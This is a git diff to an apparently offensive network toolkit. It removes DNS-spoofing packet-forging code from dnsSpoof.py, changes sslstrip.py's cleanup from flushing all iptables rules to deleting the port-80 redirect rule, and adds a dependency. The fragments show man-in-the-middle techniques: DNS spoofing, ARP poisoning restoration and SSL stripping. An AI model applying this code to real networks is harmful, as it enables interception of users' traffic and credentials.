diff --git a/capabilities/exploitation/dnsSpoof.py b/capabilities/exploitation/dnsSpoof.py index a27d085..b61f879 100644 --- a/capabilities/exploitation/dnsSpoof.py +++ b/capabilities/exploitation/dnsSpoof.py @@ -27,13 +27,6 @@ def callback(self, packet): packet.accept() else: if self.domain in pkt[DNS].qd.qname: - query = sr1(IP(dst='8.8.8.8')/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname=self.new_site)),verbose=0) #Create the legitimate query - spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\ - UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\ - DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\ - an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=query[DNSRR][3].rdata)) - spoofed_pkt.show() - packet.set_payload(str(spoofed_pkt)) packet.accept() else: packet.accept() diff --git a/capabilities/exploitation/sslstrip.py b/capabilities/exploitation/sslstrip.py index f3c3614..52592d2 100644 --- a/capabilities/exploitation/sslstrip.py +++ b/capabilities/exploitation/sslstrip.py @@ -35,8 +35,8 @@ def restore(self): self.getVars() self.proc.terminate() arpEnd(self.masq_ip, self.masq_mac, self.dest_ip, self.dest_mac) - os.system("iptables -F") os.system("killall sslstrip") + os.system("iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000") def launch(self): diff --git a/pip_dependencies b/pip_dependencies index 2240022..7c6313b 100644 --- a/pip_dependencies +++ b/pip_dependencies @@ -11,3 +11,4 @@ pycrypto nose flask_cors sslstrip +ansi2html